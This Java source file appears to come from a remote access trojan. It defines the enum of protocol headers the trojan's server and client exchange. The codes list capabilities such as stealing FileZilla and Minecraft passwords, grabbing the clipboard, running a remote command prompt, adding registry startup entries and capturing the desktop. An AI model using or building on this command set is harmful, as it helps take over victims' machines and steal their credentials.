package com.redpois0n.packets;

public enum Header {

	INIT_DATE("DATE"),
	INIT_VERSION("VERSION"),
	INIT_COMPUTER_NAME("COMPUTERNAME"),
	INIT_OS_NAME("OSNAME"),
	INIT_SERVER_ID("SERVERID"),
	INIT_USERNAME("USERNAME"),
	INIT_SERVER_PATH("SERVERPATH"),
	INIT_JAVA_VERSION("JAVAVER"),
	INIT_JAVA_PATH("JAVAPATH"),
	INIT_LOCAL_IP("LOCALIP"),
	INIT_COUNTRY("COUNTRY"),
	INIT_LOCALE("LOCALE"),
	INIT_PASSWORD("PASS"),
	INIT_DRIVES("DRIVES"),
	INIT_RAM("RAM"),
	INIT_AVAILABLE_PROCESSORS("APS"),
	INIT_MONITORS("MONITOR"),
	PONG("PONG"),
	CLIPBOARD("CBOARDC"),
	CUSTOM_DIRECTORY("DIR"),
	PASSWORD_FILEZILLA("FZ"),
	ERROR_LOG("ERRLOG"),
	SEND_FILE("FILE"),
	HOST_FILE("HOSTF"),
	RAM("HERERAM"),
	CONFIG("CONFIG"),
	UTORRENT("UTOR"),
	IMAGE_PREVIEW("IC"),
	IP_CONFIG("IPC"),
	JAVA_PROPERTIES("JVM"),
	NETWORK_ADAPTER("ADAPT"),
	LIST_FOLDERS("FOLDERLIST"),
	LIST_THUMBNAILS("IMGLIST"),
	INSTALLED_PROGRAMS("INSTPROG"),
	PROCESS("PROCESS"),
	WINDOWS_SERVICE("WINSER"),
	REGISTRY_STARTUP("REGSTART"),
	MD5("MD5"),
	PLUGINS("PLUGIN"),
	VARIABLES_PROPERTIES("VARPROP"),
	SOUND("SO"),
	PASSWORD_MINECRAFT("MC"),
	FILE_PREVIEW("FC"),
	INSTALLED_LOCALES("INSTLOCALES"),
	REGISTRY("REG"),
	ACTIVE_PORT("APORT"),
	LAN("LAN"),
	COMMAND_PROMPT("CMD"),
	ERROR("ERROR"),
	FOUND_FILE("FF"),
	CHAT("CHAT"),
	DISCONNECT("DISCONNECT"),
	SINGLE_IMAGE_COMING("SINGLEIMAGECOMING"),
	IMAGE_COMING("IMAGECOMING"),
	THUMBNAIL("THUMBNAIL"),
	QUICK_DESKTOP("QUICKDESKTOP");

	private final String header;

	private Header(String header) {
		this.header = header;
	}

	public String getHeader() {
		return header;
	}

}
